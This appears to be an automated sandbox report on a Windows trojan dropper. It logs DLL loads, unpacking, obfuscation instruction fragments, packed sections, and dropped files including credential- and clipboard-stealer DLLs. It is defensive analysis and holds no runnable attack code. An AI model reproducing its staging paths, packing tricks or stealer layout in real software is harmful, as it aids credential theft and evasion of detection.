Source: C:\Users\user\AppData\Local\Temp\1000049001\amert.exe Section loaded: atlthunk.dll
Source: C:\Users\user\AppData\Local\Temp\1000049001\amert.exe Section loaded: textinputframework.dll
Source: C:\Users\user\AppData\Local\Temp\1000049001\amert.exe Section loaded: coreuicomponents.dll
Source: C:\Users\user\AppData\Local\Temp\1000049001\amert.exe Section loaded: coremessaging.dll
Source: C:\Users\user\AppData\Local\Temp\1000049001\amert.exe Section loaded: ntmarta.dll
Source: C:\Users\user\AppData\Local\Temp\1000049001\amert.exe Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\1000049001\amert.exe Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\1000049001\amert.exe Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\1000049001\amert.exe Section loaded: wtsapi32.dll
Source: C:\Users\user\AppData\Local\Temp\1000049001\amert.exe Section loaded: winsta.dll
Source: C:\Users\user\AppData\Local\Temp\1000049001\amert.exe Section loaded: textshaping.dll
Source: C:\Users\user\AppData\Local\Temp\1000049001\amert.exe Section loaded: propsys.dll
Source: C:\Users\user\AppData\Local\Temp\1000049001\amert.exe Section loaded: windows.staterepositoryps.dll
Source: C:\Users\user\AppData\Local\Temp\1000049001\amert.exe Section loaded: windows.fileexplorer.common.dll
Source: C:\Users\user\AppData\Local\Temp\1000049001\amert.exe Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\Temp\1000049001\amert.exe Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exe Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exe Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exe Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe Section loaded: rstrtmgr.dll
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe Section loaded: ncrypt.dll
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe Section loaded: ntasn1.dll
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe Section loaded: d3d11.dll
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe Section loaded: dxgi.dll
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe Section loaded: resourcepolicyclient.dll
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe Section loaded: d3d10warp.dll
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe Section loaded: dxcore.dll
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe Section loaded: devobj.dll
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe Section loaded: webio.dll
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe Section loaded: rasadhlp.dll
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe Section loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe Section loaded: schannel.dll
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe Section loaded: mskeyprotect.dll
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe Section loaded: ncryptsslp.dll
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe Section loaded: msasn1.dll
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe Section loaded: gpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1000042001\ad0e9cf6d6.exe Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\1000042001\ad0e9cf6d6.exe Section loaded: rstrtmgr.dll
Source: C:\Users\user\AppData\Local\Temp\1000042001\ad0e9cf6d6.exe Section loaded: ncrypt.dll
Source: C:\Users\user\AppData\Local\Temp\1000042001\ad0e9cf6d6.exe Section loaded: ntasn1.dll
Source: C:\Users\user\AppData\Local\Temp\1000042001\ad0e9cf6d6.exe Section loaded: d3d11.dll
Source: C:\Users\user\AppData\Local\Temp\1000042001\ad0e9cf6d6.exe Section loaded: dxgi.dll
Source: C:\Users\user\AppData\Local\Temp\1000042001\ad0e9cf6d6.exe Section loaded: resourcepolicyclient.dll
Source: C:\Users\user\AppData\Local\Temp\1000042001\ad0e9cf6d6.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\1000042001\ad0e9cf6d6.exe Section loaded: d3d10warp.dll
Source: C:\Users\user\AppData\Local\Temp\1000042001\ad0e9cf6d6.exe Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\1000042001\ad0e9cf6d6.exe Section loaded: dxcore.dll
Source: C:\Users\user\AppData\Local\Temp\1000042001\ad0e9cf6d6.exe Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\1000042001\ad0e9cf6d6.exe Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\Temp\1000042001\ad0e9cf6d6.exe Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\1000042001\ad0e9cf6d6.exe Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\1000042001\ad0e9cf6d6.exe Section loaded: devobj.dll
Source: C:\Users\user\AppData\Local\Temp\1000042001\ad0e9cf6d6.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1000042001\ad0e9cf6d6.exe Section loaded: webio.dll
Source: C:\Users\user\AppData\Local\Temp\1000042001\ad0e9cf6d6.exe Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1000042001\ad0e9cf6d6.exe Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Local\Temp\1000042001\ad0e9cf6d6.exe Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\Temp\1000042001\ad0e9cf6d6.exe Section loaded: rasadhlp.dll
Source: C:\Users\user\AppData\Local\Temp\1000042001\ad0e9cf6d6.exe Section loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Local\Temp\1000042001\ad0e9cf6d6.exe Section loaded: schannel.dll
Source: C:\Users\user\AppData\Local\Temp\1000042001\ad0e9cf6d6.exe Section loaded: mskeyprotect.dll
Source: C:\Users\user\AppData\Local\Temp\1000042001\ad0e9cf6d6.exe Section loaded: ncryptsslp.dll
Source: C:\Users\user\AppData\Local\Temp\1000042001\ad0e9cf6d6.exe Section loaded: msasn1.dll
Source: C:\Users\user\AppData\Local\Temp\1000042001\ad0e9cf6d6.exe Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Local\Temp\1000042001\ad0e9cf6d6.exe Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Local\Temp\1000042001\ad0e9cf6d6.exe Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\Temp\1000042001\ad0e9cf6d6.exe Section loaded: gpapi.dll
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe Section loaded: rstrtmgr.dll
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe Section loaded: ncrypt.dll
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe Section loaded: ntasn1.dll
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe Section loaded: d3d11.dll
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe Section loaded: dxgi.dll
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe Section loaded: resourcepolicyclient.dll
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe Section loaded: d3d10warp.dll
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe Section loaded: dxcore.dll
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe Section loaded: devobj.dll
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe Section loaded: webio.dll
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe Section loaded: rasadhlp.dll
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe Section loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe Section loaded: schannel.dll
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe Section loaded: mskeyprotect.dll
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe Section loaded: ncryptsslp.dll
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe Section loaded: msasn1.dll
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe Section loaded: gpapi.dll
Source: C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exe Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exe Section loaded: wininet.dll
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{148BD52A-A2AB-11CE-B11F-00AA00530503}\InProcServer32 Jump to behavior
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll Jump to behavior
Source: C:\Windows\System32\rundll32.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office Jump to behavior
Source: SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe Static file information: File size 3086848 > 1048576
Source: SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe Static PE information: Raw size of byqduimw is bigger than: 0x100000 < 0x2c1600
Source: Binary string: D:\Mktmp\StealerDLL\x64\Release\STEALERDLL.pdb source: cred64[1].dll.6.dr

Data Obfuscation
barindex
Detected unpacking (changes PE section rights)
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe Unpacked PE file: 0.2.SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe.b00000.0.unpack :EW;.rsrc:W;.idata :W;byqduimw:EW;otarkcdf:EW; vs :ER;.rsrc:W;.idata :W;byqduimw:EW;otarkcdf:EW;
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Unpacked PE file: 1.2.explorha.exe.480000.0.unpack :EW;.rsrc:W;.idata :W;byqduimw:EW;otarkcdf:EW; vs :ER;.rsrc:W;.idata :W;byqduimw:EW;otarkcdf:EW;
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Unpacked PE file: 2.2.explorha.exe.480000.0.unpack :EW;.rsrc:W;.idata :W;byqduimw:EW;otarkcdf:EW; vs :ER;.rsrc:W;.idata :W;byqduimw:EW;otarkcdf:EW;
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Unpacked PE file: 6.2.explorha.exe.480000.0.unpack :EW;.rsrc:W;.idata :W;byqduimw:EW;otarkcdf:EW; vs :ER;.rsrc:W;.idata :W;byqduimw:EW;otarkcdf:EW;
Source: C:\Users\user\AppData\Local\Temp\1000042001\ad0e9cf6d6.exe Unpacked PE file: 14.2.ad0e9cf6d6.exe.100000.0.unpack :EW;.rsrc:W;.idata :W; :EW;kmmiqwbd:EW;fznmywdp:EW; vs :ER;.rsrc:W;.idata :W; :EW;kmmiqwbd:EW;fznmywdp:EW;
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Unpacked PE file: 19.2.MPGPH131.exe.9a0000.0.unpack :EW;.rsrc:W;.idata :W; :EW;kmmiqwbd:EW;fznmywdp:EW; vs :ER;.rsrc:W;.idata :W; :EW;kmmiqwbd:EW;fznmywdp:EW;
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Unpacked PE file: 20.2.MPGPH131.exe.9a0000.0.unpack :EW;.rsrc:W;.idata :W; :EW;kmmiqwbd:EW;fznmywdp:EW; vs :ER;.rsrc:W;.idata :W; :EW;kmmiqwbd:EW;fznmywdp:EW;
Source: C:\Users\user\AppData\Local\Temp\1000042001\ad0e9cf6d6.exe Unpacked PE file: 22.2.ad0e9cf6d6.exe.100000.0.unpack :EW;.rsrc:W;.idata :W; :EW;kmmiqwbd:EW;fznmywdp:EW; vs :ER;.rsrc:W;.idata :W; :EW;kmmiqwbd:EW;fznmywdp:EW;
Source: C:\Users\user\AppData\Local\Temp\1000049001\amert.exe Unpacked PE file: 24.2.amert.exe.4a0000.0.unpack :EW;.rsrc:W;.idata :W; :EW;nrhwmcml:EW;cbtiwtyd:EW; vs :ER;.rsrc:W;.idata :W; :EW;nrhwmcml:EW;cbtiwtyd:EW;
Source: C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exe Unpacked PE file: 25.2.explorgu.exe.160000.0.unpack :EW;.rsrc:W;.idata :W; :EW;nrhwmcml:EW;cbtiwtyd:EW; vs :ER;.rsrc:W;.idata :W; :EW;nrhwmcml:EW;cbtiwtyd:EW;
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe Unpacked PE file: 26.2.RageMP131.exe.e30000.0.unpack :EW;.rsrc:W;.idata :W; :EW;kmmiqwbd:EW;fznmywdp:EW; vs :ER;.rsrc:W;.idata :W; :EW;kmmiqwbd:EW;fznmywdp:EW;
Source: C:\Users\user\AppData\Local\Temp\1000042001\ad0e9cf6d6.exe Unpacked PE file: 27.2.ad0e9cf6d6.exe.100000.0.unpack :EW;.rsrc:W;.idata :W; :EW;kmmiqwbd:EW;fznmywdp:EW; vs :ER;.rsrc:W;.idata :W; :EW;kmmiqwbd:EW;fznmywdp:EW;
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe Unpacked PE file: 28.2.RageMP131.exe.e30000.0.unpack :EW;.rsrc:W;.idata :W; :EW;kmmiqwbd:EW;fznmywdp:EW; vs :ER;.rsrc:W;.idata :W; :EW;kmmiqwbd:EW;fznmywdp:EW;
Source: C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exe Unpacked PE file: 29.2.explorgu.exe.160000.0.unpack :EW;.rsrc:W;.idata :W; :EW;nrhwmcml:EW;cbtiwtyd:EW; vs :ER;.rsrc:W;.idata :W; :EW;nrhwmcml:EW;cbtiwtyd:EW;
Entry point lies outside standard sections
Source: initial sample Static PE information: section where entry point is pointing to: otarkcdf
PE file contains sections with non-standard names
Source: SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe Static PE information: section name:
Source: SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe Static PE information: section name: .idata
Source: SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe Static PE information: section name: byqduimw
Source: SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe Static PE information: section name: otarkcdf
Source: explorha.exe.0.dr Static PE information: section name:
Source: explorha.exe.0.dr Static PE information: section name: .idata
Source: explorha.exe.0.dr Static PE information: section name: byqduimw
Source: explorha.exe.0.dr Static PE information: section name: otarkcdf
Source: ad0e9cf6d6.exe.6.dr Static PE information: section name:
Source: ad0e9cf6d6.exe.6.dr Static PE information: section name: .idata
Source: ad0e9cf6d6.exe.6.dr Static PE information: section name:
Source: ad0e9cf6d6.exe.6.dr Static PE information: section name: kmmiqwbd
Source: ad0e9cf6d6.exe.6.dr Static PE information: section name: fznmywdp
Source: cred64[1].dll.6.dr Static PE information: section name: _RDATA
Source: cred64.dll.6.dr Static PE information: section name: _RDATA
Source: sarra[1].exe.6.dr Static PE information: section name:
Source: sarra[1].exe.6.dr Static PE information: section name: .idata
Source: sarra[1].exe.6.dr Static PE information: section name:
Source: sarra[1].exe.6.dr Static PE information: section name: plzndgzq
Source: sarra[1].exe.6.dr Static PE information: section name: imnknifl
Source: amert[1].exe.6.dr Static PE information: section name:
Source: amert[1].exe.6.dr Static PE information: section name: .idata
Source: amert[1].exe.6.dr Static PE information: section name:
Source: amert[1].exe.6.dr Static PE information: section name: nrhwmcml
Source: amert[1].exe.6.dr Static PE information: section name: cbtiwtyd
Source: amert.exe.6.dr Static PE information: section name:
Source: amert.exe.6.dr Static PE information: section name: .idata
Source: amert.exe.6.dr Static PE information: section name:
Source: amert.exe.6.dr Static PE information: section name: nrhwmcml
Source: amert.exe.6.dr Static PE information: section name: cbtiwtyd
Source: random[1].exe0.6.dr Static PE information: section name:
Source: random[1].exe0.6.dr Static PE information: section name: .idata
Source: random[1].exe0.6.dr Static PE information: section name:
Source: random[1].exe0.6.dr Static PE information: section name: kmmiqwbd
Source: random[1].exe0.6.dr Static PE information: section name: fznmywdp
Source: RageMP131.exe.14.dr Static PE information: section name:
Source: RageMP131.exe.14.dr Static PE information: section name: .idata
Source: RageMP131.exe.14.dr Static PE information: section name:
Source: RageMP131.exe.14.dr Static PE information: section name: kmmiqwbd
Source: RageMP131.exe.14.dr Static PE information: section name: fznmywdp
Source: MPGPH131.exe.14.dr Static PE information: section name:
Source: MPGPH131.exe.14.dr Static PE information: section name: .idata
Source: MPGPH131.exe.14.dr Static PE information: section name:
Source: MPGPH131.exe.14.dr Static PE information: section name: kmmiqwbd
Source: MPGPH131.exe.14.dr Static PE information: section name: fznmywdp
Source: explorgu.exe.24.dr Static PE information: section name:
Source: explorgu.exe.24.dr Static PE information: section name: .idata
Source: explorgu.exe.24.dr Static PE information: section name:
Source: explorgu.exe.24.dr Static PE information: section name: nrhwmcml
Source: explorgu.exe.24.dr Static PE information: section name: cbtiwtyd
Uses code obfuscation techniques (call, push, ret)
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe Code function: 0_2_00E2D034 push ecx; mov dword ptr [esp], 350DAB43h 0_2_00E2D044
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe Code function: 0_2_00E2D034 push edi; mov dword ptr [esp], 5D8F0098h 0_2_00E2D0E4
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe Code function: 0_2_00E2D034 push 41271905h; mov dword ptr [esp], esi 0_2_00E2D114
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe Code function: 0_2_00E2D000 push 524417C7h; mov dword ptr [esp], esi 0_2_00E2D005
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe Code function: 0_2_00E2D000 push eax; mov dword ptr [esp], 57B86D65h 0_2_00E2D013
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe Code function: 0_2_00E2D000 push edx; mov dword ptr [esp], 571ECD59h 0_2_00E2D021
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe Code function: 0_2_00E2D000 push ecx; mov dword ptr [esp], 350DAB43h 0_2_00E2D044
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe Code function: 0_2_00E2D000 push edi; mov dword ptr [esp], 5D8F0098h 0_2_00E2D0E4
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe Code function: 0_2_00E2D000 push 41271905h; mov dword ptr [esp], esi 0_2_00E2D114
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe Code function: 0_2_00B129A0 push esp; ret 0_2_00B129A1
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe Code function: 0_2_00E2D184 push 2910D7E3h; mov dword ptr [esp], edx 0_2_00E2D189
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe Code function: 0_2_00E2D184 push 15830EA0h; mov dword ptr [esp], ebp 0_2_00E2D1A6
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe Code function: 0_2_00E2D184 push edi; mov dword ptr [esp], 682C439Fh 0_2_00E2D1B0
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe Code function: 0_2_00E2D184 push ecx; mov dword ptr [esp], esi 0_2_00E2D1D1
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe Code function: 0_2_00E2D184 push ebp; mov dword ptr [esp], 00000000h 0_2_00E2D24B
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe Code function: 0_2_00B09420 push ebx; ret 0_2_00B0942A
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe Code function: 0_2_00B08DE6 push esi; iretd 0_2_00B08DE7
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe Code function: 0_2_00B1EFBC push ecx; ret 0_2_00B1EFCF
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe Code function: 0_2_050005BD push 0000005Bh; retn 0004h 0_2_050005C4
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Code function: 1_2_007AD034 push ecx; mov dword ptr [esp], 350DAB43h 1_2_007AD044
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Code function: 1_2_007AD034 push edi; mov dword ptr [esp], 5D8F0098h 1_2_007AD0E4
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Code function: 1_2_007AD034 push 41271905h; mov dword ptr [esp], esi 1_2_007AD114
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Code function: 1_2_007AD000 push 524417C7h; mov dword ptr [esp], esi 1_2_007AD005
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Code function: 1_2_007AD000 push eax; mov dword ptr [esp], 57B86D65h 1_2_007AD013
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Code function: 1_2_007AD000 push edx; mov dword ptr [esp], 571ECD59h 1_2_007AD021
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Code function: 1_2_007AD000 push ecx; mov dword ptr [esp], 350DAB43h 1_2_007AD044
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Code function: 1_2_007AD000 push edi; mov dword ptr [esp], 5D8F0098h 1_2_007AD0E4
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Code function: 1_2_007AD000 push 41271905h; mov dword ptr [esp], esi 1_2_007AD114
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Code function: 1_2_0048C0E8 push cs; retn 0002h 1_2_0048C0E9
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Code function: 1_2_007AD184 push 2910D7E3h; mov dword ptr [esp], edx 1_2_007AD189
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Code function: 1_2_007AD184 push 15830EA0h; mov dword ptr [esp], ebp 1_2_007AD1A6
Source: SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe Static PE information: section name: entropy: 7.985971961341056
Source: explorha.exe.0.dr Static PE information: section name: entropy: 7.985971961341056
Source: ad0e9cf6d6.exe.6.dr Static PE information: section name: entropy: 7.93014511868909
Source: ad0e9cf6d6.exe.6.dr Static PE information: section name: kmmiqwbd entropy: 7.94902151526135
Source: sarra[1].exe.6.dr Static PE information: section name: entropy: 7.93021329597093
Source: sarra[1].exe.6.dr Static PE information: section name: plzndgzq entropy: 7.949874622894616
Source: amert[1].exe.6.dr Static PE information: section name: entropy: 7.9828707618989405
Source: amert[1].exe.6.dr Static PE information: section name: nrhwmcml entropy: 7.953187785873698
Source: amert.exe.6.dr Static PE information: section name: entropy: 7.9828707618989405
Source: amert.exe.6.dr Static PE information: section name: nrhwmcml entropy: 7.953187785873698
Source: random[1].exe0.6.dr Static PE information: section name: entropy: 7.93014511868909
Source: random[1].exe0.6.dr Static PE information: section name: kmmiqwbd entropy: 7.94902151526135
Source: RageMP131.exe.14.dr Static PE information: section name: entropy: 7.93014511868909
Source: RageMP131.exe.14.dr Static PE information: section name: kmmiqwbd entropy: 7.94902151526135
Source: MPGPH131.exe.14.dr Static PE information: section name: entropy: 7.93014511868909
Source: MPGPH131.exe.14.dr Static PE information: section name: kmmiqwbd entropy: 7.94902151526135
Source: explorgu.exe.24.dr Static PE information: section name: entropy: 7.9828707618989405
Source: explorgu.exe.24.dr Static PE information: section name: nrhwmcml entropy: 7.953187785873698
Drops PE files
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe File created: C:\Users\user\AppData\Roaming\a091ec0a6e2227\clip64.dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1000042001\ad0e9cf6d6.exe File created: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[1].exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe File created: C:\Users\user\AppData\Local\Temp\1000051001\b977f667d6.exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\clip64[1].dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe File created: C:\Users\user\AppData\Local\Temp\1000049001\amert.exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\amert[1].exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\random[1].exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe File created: C:\Users\user\AppData\Roaming\a091ec0a6e2227\cred64.dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\sarra[1].exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1000042001\ad0e9cf6d6.exe File created: C:\ProgramData\MPGPH131\MPGPH131.exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1000049001\amert.exe File created: C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exe Jump to dropped file
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe File created: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\cred64[1].dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe File created: C:\Users\user\AppData\Local\Temp\1000042001\ad0e9cf6d6.exe Jump to dropped file
Drops PE files to the application program directory (C:\ProgramData)
Source: C:\Users\user\AppData\Local\Temp\1000042001\ad0e9cf6d6.exe File created: C:\ProgramData\MPGPH131\MPGPH131.exe Jump to dropped file

Boot Survival
